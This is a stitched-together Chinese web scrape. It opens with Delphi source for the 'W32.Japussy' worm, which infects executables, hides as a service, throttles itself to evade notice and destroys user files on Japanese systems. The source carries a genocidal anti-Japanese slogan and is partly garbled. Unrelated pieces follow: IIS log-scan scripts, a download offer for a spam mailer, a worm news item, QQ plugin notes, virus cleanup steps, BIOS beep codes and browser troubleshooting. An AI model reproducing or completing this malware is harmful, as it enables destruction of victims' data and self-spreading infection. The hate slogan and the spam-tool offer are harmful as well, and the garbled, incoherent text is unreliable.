program Japussy;
uses
Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};
const
HeaderSize = 82432; //病毒体的大小
IconOffset = $12EB8; //PE文件主图标的偏移量

//在我的Delphi5 SP1上面编译得到的大小，其它版本的Delphi可能不同
//查找2800000020的十六进制字符串可以找到主图标的偏移量

{
HeaderSize = 38912; //Upx压缩过病毒体的大小
IconOffset = $92BC; //Upx压缩过PE文件主图标的偏移量

//Upx 1.24W 用法: upx -9 --8086 Japussy.exe
}
IconSize = $2E8; //PE文件主图标的大小--744字节
IconTail = IconOffset + IconSize; //PE文件主图标的尾部
ID = $44444444; //感染标记

//垃圾码，以备写入
Catchword = 'If a race need to be killed out, it must be Yamato. ' +
'If a country need to be destroyed, it must be Japan! ' +
'*** W32.Japussy.Worm.A ***';
{$R *.RES}
function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;
stdcall; external 'Kernel32.dll'; //函数声明
var
TmpFile: string;
Si: STARTUPINFO;
Pi: PROCESS_INFORMATION;
IsJap: Boolean = False; //日文操作系统标记
{ 判断是否为Win9x }
function IsWin9x: Boolean;
var
Ver: TOSVersionInfo;
begin
Result := False;
Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
if not GetVersionEx(Ver) then
Exit;
if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x
Result := True;
end;
{ 在流之间复制 }
procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;
dStartPos: Integer; Count: Integer);
var
sCurPos, dCurPos: Integer;
begin
sCurPos := Src.Position;
dCurPos := Dst.Position;
Src.Seek(sStartPos, 0);
Dst.Seek(dStartPos, 0);
Dst.CopyFrom(Src, Count);
Src.Seek(sCurPos, 0);
Dst.Seek(dCurPos, 0);
end;
{ 将宿主文件从已感染的PE文件中分离出来，以备使用 }
procedure ExtractFile(FileName: string);
var
sStream, dStream: TFileStream;
begin
try
sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
try
dStream := TFileStream.Create(FileName, fmCreate);
try
sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分
dStream.CopyFrom(sStream, sStream.Size - HeaderSize);
finally
dStream.Free;
end;
finally
sStream.Free;
end;
except
end;
end;
{ 填充STARTUPINFO结构 }
procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);
begin
Si.cb := SizeOf(Si);
Si.lpReserved := nil;
Si.lpDesktop := nil;
Si.lpTitle := nil;
Si.dwFlags := STARTF_USESHOWWINDOW;
Si.wShowWindow := State;
Si.cbReserved2 := 0;
Si.lpReserved2 := nil;
end;
{ 发带毒邮件 }
procedure SendMail;
begin
//哪位仁兄愿意完成之？
end;
{ 感染PE文件 }
procedure InfectOneFile(FileName: string);
var
HdrStream, SrcStream: TFileStream;
IcoStream, DstStream: TMemoryStream;
iID: LongInt;
aIcon: TIcon;
Infected, IsPE: Boolean;
i: Integer;
Buf: array[0..1] of Char;
begin
try //出错则文件正在被使用，退出
if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己则不感染
Exit;
Infected := False;
IsPE := False;
SrcStream := TFileStream.Create(FileName, fmOpenRead);
try
for i := 0 to $108 do //检查PE文件头
begin
SrcStream.Seek(i, soFromBeginning);
SrcStream.Read(Buf, 2);
if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记
begin
IsPE := True; //是PE文件
Break;
end;
end;
SrcStream.Seek(-4, soFromEnd); //检查感染标记
SrcStream.Read(iID, 4);
if (iID = ID) or (SrcStream.Size 16) and (SearchRec.Name '.') and
(SearchRec.Name '..') then
Result := 0 //不是目录
else if (SearchRec.Attr = 16) and (SearchRec.Name '.') and
(SearchRec.Name '..') then
Result := 1 //不是根目录
else Result := 2; //是根目录
end;
begin
if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then
begin
repeat
PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列，避免引起怀疑
if IsValidDir(SearchRec) = 0 then
begin
Fn := Path + SearchRec.Name;
Ext := UpperCase(ExtractFileExt(Fn));
if (Ext = '.EXE') or (Ext = '.SCR') then
begin
InfectOneFile(Fn); //感染可执行文件
end
else if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then
begin
//感染HTML和ASP文件，将Base64编码后的病毒写入
//感染浏览此网页的所有用户
//哪位大兄弟愿意完成之？
end
else if Ext = '.WAB' then //Outlook地址簿文件
begin
//获取Outlook邮件地址
end
else if Ext = '.ADC' then //Foxmail地址自动完成文件
begin
//获取Foxmail邮件地址
end
else if Ext = 'IND' then //Foxmail地址簿文件
begin
//获取Foxmail邮件地址
end
else
begin
if IsJap then //是倭文操作系统
begin
if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or
(Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or
(Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or
(Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or
(Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or
(Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then
SmashFile(Fn); //摧毁文件
end;
end;
end;
//感染或删除一个文件后睡眠200毫秒，避免CPU占用率过高引起怀疑
Sleep(200);
until (FindNext(SearchRec) 0);
end;
FindClose(SearchRec);
SubDir := TStringList.Create;
if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then
begin
repeat
if IsValidDir(SearchRec) = 1 then
SubDir.Add(SearchRec.Name);
until (FindNext(SearchRec) 0);
end;
FindClose(SearchRec);
Count := SubDir.Count - 1;
for i := 0 to Count do
LoopFiles(Path + SubDir.Strings + '', Mask);
FreeAndNil(SubDir);
end;
{ 遍历磁盘上所有的文件 }
procedure InfectFiles;
var
DriverList: string;
i, Len: Integer;
begin
if GetACP = 932 then //日文操作系统
IsJap := True; //DriverList := GetDrives; //得到可写的磁盘列表
Len := Length(DriverList);
while True do //死循环
begin
for i := Len downto 1 do //遍历每个磁盘驱动器
LoopFiles(DriverList + ':', '*.*'); //感染之
SendMail; //发带毒邮件
Sleep(1000 * 60 * 5); //睡眠5分钟
end;
end;
{ 主程序开始 }
begin
if IsWin9x then //是Win9x
RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程
else //WinNT
begin
//远程线程映射到Explorer进程
//哪位兄台愿意完成之？
end;
//如果是原始病毒体自己
if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then
InfectFiles //感染和发邮件
else //已寄生于宿主程序上了，开始工作
begin
TmpFile := ParamStr(0); //创建临时文件
Delete(TmpFile, Length(TmpFile) - 4, 4);
TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件，多一个空格
ExtractFile(TmpFile); //分离之
FillStartupInfo(Si, SW_SHOWDEFAULT);
CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,
0, nil, '.', Si, Pi); //创建新进程运行之
InfectFiles; //感染和发邮件
end;
end.

以下是引用片段： Time /t >> IIS-Scan.log  Find /i "需要查找的字符" C:/WINDOWS/system32/LogFiles/Httperr/*.* >> IIS-Scan.log

上面这个 Bat 呢.可以很方便的查找 IIS 6.0 的日志文件里的入侵数据.
我们都知道.Windows 2003 Server的IIS里面有个专有的 "Httperr" 这个文件夹.
专门记录相关的错误.当然.如果你用扫描软件对服务器进行扫描的话呢.
肯定都会被记录在这里.这个 Bat 文件使用了 Find.exe 命令.

第一行是记录服务器时间.并写入名为 IIS-Scan.Log 这个文件里.
第二行.查找.参数 i 是不区分大小写.然后在 "" 里面输入自己需要查找的字符串.
比如经常会出现 "../.." 这样的扫描记录.或者是 "%&" 这样的U码试探.
"*.*" 是查询 "Httperr" 这整个目录的所有文件.并把查找的结果写入IIS-Scan.log.

下面是我自己服务器上用的一套完整的脚本!

以下是引用片段： @Cd /  Rem ********  Auto Scan IIS 6.0 LogFiles By www.Reistlin.com ********  Rem          ******** Scaning...Please...Waiting... ********  @Echo Off  Time /t >> IIS-Scan.log  Find /i ".." C:/WINDOWS/system32/LogFiles/Httperr/*.* >> IIS-Scan.log  Find /i "//" C:/WINDOWS/system32/LogFiles/Httperr/*.* >> IIS-Scan.log  Find /i "//" C:/WINDOWS/system32/LogFiles/Httperr/*.* >> IIS-Scan.log  Find /i "windows" C:/WINDOWS/system32/LogFiles/Httperr/*.* >> IIS-Scan.log  Find /i "private" C:/WINDOWS/system32/LogFiles/Httperr/*.* >> IIS-Scan.log  Find /i "printer" C:/WINDOWS/system32/LogFiles/Httperr/*.* >> IIS-Scan.log  Find /i "session" C:/WINDOWS/system32/LogFiles/Httperr/*.* >> IIS-Scan.log  Find /i "admin" C:/WINDOWS/system32/LogFiles/Httperr/*.* >> IIS-Scan.log  Find /i "winnt" C:/WINDOWS/system32/LogFiles/Httperr/*.* >> IIS-Scan.log  Find /i "null" C:/WINDOWS/system32/LogFiles/Httperr/*.* >> IIS-Scan.log  Find /i "boot" C:/WINDOWS/system32/LogFiles/Httperr/*.* >> IIS-Scan.log  Find /i "www" C:/WINDOWS/system32/LogFiles/Httperr/*.* >> IIS-Scan.log  Find /i "asa" C:/WINDOWS/system32/LogFiles/Httperr/*.* >> IIS-Scan.log  Find /i "mdb" C:/WINDOWS/system32/LogFiles/Httperr/*.* >> IIS-Scan.log  Find /i "dat" C:/WINDOWS/system32/LogFiles/Httperr/*.* >> IIS-Scan.log  Find /i "bat" C:/WINDOWS/system32/LogFiles/Httperr/*.* >> IIS-Scan.log  Find /i "rpc" C:/WINDOWS/system32/LogFiles/Httperr/*.* >> IIS-Scan.log  Find /i "bin" C:/WINDOWS/system32/LogFiles/Httperr/*.* >> IIS-Scan.log  Find /i "vti" C:/WINDOWS/system32/LogFiles/Httperr/*.* >> IIS-Scan.log  Find /i "doc" C:/WINDOWS/system32/LogFiles/Httperr/*.* >> IIS-Scan.log  Find /i "cgi" C:/WINDOWS/system32/LogFiles/Httperr/*.* >> IIS-Scan.log  Find /i "log" C:/WINDOWS/system32/LogFiles/Httperr/*.* >> IIS-Scan.log  Find /i "iis" C:/WINDOWS/system32/LogFiles/Httperr/*.* >> IIS-Scan.log  Find /i "ida" C:/WINDOWS/system32/LogFiles/Httperr/*.* >> IIS-Scan.log  Find /i "idc" C:/WINDOWS/system32/LogFiles/Httperr/*.* >> IIS-Scan.log  Find /i "idq" C:/WINDOWS/system32/LogFiles/Httperr/*.* >> IIS-Scan.log  Start IIS-Scan.log

以下是引用片段： Time /t >> Port.log  Netstat -NA -P Tcp 600 >> Port.log

上面这个.使用NETSTAT -NA命令.查询连接数和端口数.并写入Port.log.
注意那个 600 的意思是 600秒.也就是每 600 秒记录一次.
慎重使用.因为一分钟记录一次.会导致 Port.log 文件随着时间的推移而越来越大.
我们还是推荐使用6000吧.或者3000秒也可以.半个小时记录一次不过分吧. 

以下是引用片段： Time /t >> 3389.log   Netstat -n -p tcp | Find ":3389" >> 3389.log

这是微软自己出的一款超好用的虚拟光驱,我用了很久,今天拿出来与大家分享.






点击下载该文件

功能
内置快马一只，直接把信送到别人的邮箱
支持匿名送信哈
支持HTML格式
支持多人发送
支持多附件
整简单来说
就是个垃圾邮件发送器
点我下载

这个是“呢喃公子”从1月份黑防光盘里提出来的

怕病毒的就不要下

http://bbs.kill-v.com/hf.rar

Http://disk.hz-zj.cn/Get.asp?Id=20071620254hgbj

天极网12月30日消息(他山石编译)据国外媒体报道，安全机构Verisign公司警告称，一种采用了“新年快乐”为主题的新的电子邮件蠕虫已经到达收件箱。
安全公司表示，目前这一蠕虫已经在160个电子邮件域名中蔓延。
用户一旦点击“postcard.exe”附件将受到损害。这一文件将在计算机上安装数个不同的怀恶意代码的变种，其中包括木马Tibs病毒、Nwar,Banwarum和 蠕虫Glowa。被感染的计算机将进行大规模的投递垃圾邮件。
安全公司指出，这一蠕虫已经投递了大量的垃圾邮件，安全公司检测了一个网络，蠕虫每秒钟发送5封垃圾邮件。
这一蠕虫需要用户的互动才能够导致危害，安全公司警告电子邮件用户，在他们认为可能是来自朋友的合法的新年祝贺信息，在点击时一定要谨慎。
安全公司称，本周四，许多网络报告说电子邮件被拦截。本月早些时候，与“postcard.exe”附件相同名子的攻击已经蔓延。这是一次新的在很大程度上未被识破的威胁。

下载地址: http://www.cnbeta.com/ugmbbc/coralqq5b3.rar
建议用迅雷下载

■ 北京理工大学珊瑚虫工作室[Coral Studio]出品

■ 珊瑚虫显 IP 增强包开发者名单：
---------------------------
项目管理: soff @ 珊瑚虫工作室
加载库设计: cygwin @ 水木社区
KQL: quaful, luma, notXX @ 水木社区
珊瑚虫工作室: http://www.coralqq.com
水木社区: http://www.newsmth.net

■ 本增强包适用于腾讯 QQ2005/QQ2006/TM2005/TM2006

■ 使用方法：直接将所有文件解压到任意目录，然后运行 CoralQQ.exe 启动增强包，首次运行需要指定 QQ.exe/TM.exe/TMShell.exe 所在位置。

☆ IP 显示 ☆
提供四种显示 IP 的方式，可通过参数定制器自行设置：
1. 在主面板好友列表中，当鼠标移动到头像时，显示该好友的 IP 信息；
2. 传统 IP 条，可自定义是否显示及其具体位置；
3. 在消息对话框中，IP 信息显示在其标题栏中，可自定义是否显示；
4. 另外，当鼠标悬停在左上方的头像和号码处或者消息对话框的边缘处(可定制)，将显示对方的 IP 信息及地理位置，此时单击鼠标右键可将 IP 信息复制到剪贴板。

■ 腾讯 QQ 版权归深圳市腾讯计算机系统有限公司所有，本增强包仅为方便用户使用之辅助性工具，没有任何侵权意图。

■ 未经珊瑚虫工作室同意，任何人不得以任何形式重新打包此增强包，珊瑚虫工作室保留追究违者之责任的权利，谢谢合作。

2006 年 12 月 25 日推出 v5.0 B3 测试版
☆ 支持 QQ2006 正式版
☆ 支持在 TM 好友的聊天对话框中显示 IP
☆ [CoralHotkey] 修正了退出时崩溃的问题
☆ 修正主面板悬停窗口显示好友游戏状态时 IP 信息有时候会消失的问题
☆ 修正了某些情况下刷新好友 IP 时导致崩溃的问题
☆ 一些界面改进
☆ IP 数据更新到 珊瑚虫精简 IP 数据库 12/17 15:40

现象：在登陆系统后不进行任何操作的情况下，系统不断生成IEXPLOREV.EXE进程
每隔1分钟左右就会生成一个，除非你自己打开IE，这种情况才会终止（用最新的卡巴杀不出毒！！！！）
我自己的机子就出现的这样情况，经过一夜的努力，和网上的资料 终于搞定了
首先声明，这是病毒引起的，这样的情况我暂时只知道有2种病毒可以导致（而且应该都是wdm.exe的变种。
所以也不排除其他变种的情况），不过最主要的一点就是：
请查看你的QQ安装目录下是否有：TIMPlatfrom.exe和TIMPlatform.exe 这2个文件（注意哦，一字的差别）
如果有那么可以肯定是中标了
好。开始说清除步骤

第一种病毒的情况：Ravdm.exe病毒
1. 删除病毒文件：
C:WINDOWSsystem32Ravdm.exe
C:WINDOWSsystem32driversRinld.sys
%QQ%TIMPlatform.exe（就是QQ的安装目录下）

2. 改名QQ目录下TIMPlatfrom.exe为TIMPlatform.exe
3.清除注册表项
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun]
"9"="%System%Ravdm.exe"
（最好是搜索整个注册表，查找“ravdm”和“rinld”，将所有找到的键全部删除）

4.！！！！！马上重起电脑


第二种病毒的情况：vpcrm.exe病毒
1.C:WINDOWSsystem32vpcrm.exe
C:WINDOWSsystem32driversmoduleusb.sys
%QQ%TIMPlatform.exe
2 . 改名QQ目录下TIMPlatfrom.exe为TIMPlatform.exe
3. 删除注册表启动项：
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun]
"9"="%System%vpcrm.exe"
4。再次强调，马上重新启动吧。。。。。OK

Award BIOS：

1短：系统正常启动
2短：常规错误。解决方法：重设BIOS
1长1短：RAM或主板出错
1长2短：显示器或显示卡错误
1长3短：键盘控制器错误
1长9短：主板FLASH RAM 或EPROM错误，BIOS损坏
不停地响（长声）：内存条未插紧或损坏
不听地响：电源、显示器未和显卡连接好
重复短响：电源有问题
无声音无显示：电源有问题

AWI BIOS：

1短：内存刷新失败。解决方法，更换内存条
2短：内存ECC效验错误。解决方法：进入CMOS设置，将ECC效验关闭
3短：系统基本内存（第一个64KB）检查失败
4短：系统时钟出错
5短：CPU错误
6短：键盘控制器错误
7短：系统实模式错误，不能切换到保护模式
8短：显存错误
9短：ROM BIOS检验和错误
1长3短：内存错误
1长8短：显示测试错误

Phoenix BIOS：

1短：系统启动正常
1短1短1短：系统加点自检初始化失败
1短1短2短：主板错误
1短1短3短：CMOS或电池错误
1短1短4短：ROM BIOS效验失败
1短2短1短：系统时钟错误
1短2短2短：DMA初始化失败
1短2短3短：DMA页寄存器错误
1短3短1短：RAM刷新错误
1短3短2短：基本内存错误
1短4短1短：基本内存地址线错误
1短4短2短：基本内存效验错误
1短4短3短：EISA时序器错误
1短4短4短：EASA NMI口错误
2短1短2短到2短4短4短（即所有开始为2短的声音的组合）：基本内存错误
3短1短1短：从DMA寄存器错误
3短1短2短：主DMA寄存器错误
3短1短3短：主中断处理寄存器错误
3短1短4短：从中断处理寄存器错误
3短2短4短：键盘控制器错误
3短3短4短：显示卡内存错误
3短4短2短：显示错误
3短4短3短：未发现显示只读存储器
4短2短1短：时钟错误
4短2短2短：关机错误
4短2短3短：A20门错误
4短2短4短：保护模式中断错误
4短3短1短：内存错误
4短3短3短：时钟2错误
4短3短4短：实时钟错误
4短4短1短：串行口错误
4短4短2短：并行口错误
4短4短3短：数字协处理器错误

兼容BIOS：

1短：系统正常
2短：系统加电自检（POST）失败
1长：电源错误，如果无显示，则为显示卡错误
1长1短：主板错误
1长2短：显卡错误
1短1短1短：电源错误
3长1短：键盘错误

无法显示网页
您正在查找的页当前不可用。 网站可能遇到支持问题，或者您需要 调整您的浏览器设置。

--------------------------------------------------------------------------------

请尝试以下操作:

单击 刷新按钮，或稍后重试。

如果您已经在地址栏中输入该网页的地址， 请确认其拼写正确。

要检查您的网络连接，请单击工具菜单，然后单击 Internet 选项。在连接选项卡上，单击设置。 设置必须与您的局域网 (LAN) 管理员或 Internet 服务供应商 (ISP) 提供的一致。
查看您的 Internet 连接设置是否正确被检测。您可能设置让 Microsoft Windows 检查您的网站并自动发现网络连接设置(如果您的网络管理员已经启用此设置)。
单击工具菜单，然后单击Internet 选项。
在连接选项卡上，单击LAN 设置。
选择自动检测设置，然后单击确定。
某些站点要求 128-位的连接安全性。单击帮助菜单，然后单击关于 Internet Explorer 可以查看您所安装的安全强度。
如果您要访问某安全站点，请确保您的安全设置能够支持。请单击工具菜单，然后单击 Internet 选项。在“高级”选项卡上，滚动到“安全”部分，复选 SSL 2.0、SSL 3.0、TLS 1.0、PCT 1.0 设置。
单击上一步按钮，尝试其他链接。



找不到服务器或 DNS 错误
Internet Explorer


朋友们经常会出现这样的情况把
我自己总结一下
1.一般大型网站不会出现“该页无法显示”这个问题.
2.连接超时,很可能是你的当地网络速度太慢以及其他电信部门的问题.
3.很多网页打不开了，“该页无法显示”，有以下几种可能(同时提供相应解决办法)
a.网速太慢.导致本来可以打开的页面因长时间延宕而无法显示.
b.你去的那些网站本身服务器有问题或网站有问题,本来就无法打开.
c.可能与你的电脑cooike和历史设置有关,在IE导航:"工具"栏找到:internet选项>>分别点击删除文件,清除历史记录,删除COOKIES,然后关闭所有打开的页面.再重新打开看下.强烈建议你最好用别的浏览器试试看能不能打开.
d.可能与安全设置有关.在IE导航工具栏找到:internet选项>>安全>>>改为"internet".把区域等级设为"中"
e.可能是当地的电信或网通部门对某些网站作了限制的原因
f.可能用了代理,请您点击浏览器--工具--Internet选项--连接--局域网设置--去掉代理服务器下面：“为LAN使用代理服务器（X）”前的复选框的勾。
g，如果还不行，就是用户的计算机本身系统出现问题，需重装IE浏览器。
h，如果没有流量，就需多PING几个网站试试看，在开始→运行→PING 各网站的网址→确定。（注意：此方法只能用于使用拨号的用户）
i，MODEM的芯片是否是摩托罗拉的。
j，请用户先关闭浏览器再拨号，有时如果先开浏览器再拨号会出现无法打开网页的现象。
k，TCP/IP协议出错：重复安装了两次拨号网络适配器或TCP/IP，必须把多余的TCP/IP协议删除，只能保留一个。（注意：删除或重装后都必须重新启动计算机)
还有一种现象也需特别留意：就是能打开网站的首页，但不能打开二级链接，如果是这样，处理的方法是重新注册如下的DLL文件：

　　在开始—运行里输入：

　　regsvr32 Shdocvw.dll

　　regsvr32 Shell32.dll　（注意这个命令，先不用输）

　　regsvr32 Oleaut32.dll

　　regsvr32 Actxprxy.dll

　　regsvr32 Mshtml.dll

　　regsvr32 Urlmon.dll

　　regsvr32 Msjava.dll

　　regsvr32 Browseui.dll

　　注意：每输入一条，按回车。第二个命令可以先不用输，输完这些命令后重新启动windows，如果发现无效，再重新输入一遍，这次输入第二个命令。

　　如果是IE损坏的话

　　以上方法若果都不奏效，有可能是IE的内核损坏，虽经系统修复，亦无法弥补，那么重装IE就是最好的方法了。

　　如果是98或2K系统，IE的版本若是5.0，建议升级到6.0。

　　98的系统如果已经升级安装了6.0，那么在控制面板里点击添加/删除程序，将会弹出一个修复对话框，选择默认的修复，重新启动即可。

　　如果是2K+IE6.0或XP（自带的IE就是6.0的）的系统，重新IE有点麻烦，有两种方法：

　　1、打开注册表，展开HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{ 89820200-ECBD-11cf-8B85-00AA005B4383 }，将IsInstalled的DWORD的值改为0即可；

　　注：重装IE并不一定就能解决问题，仅是一个处理问题的思路而已。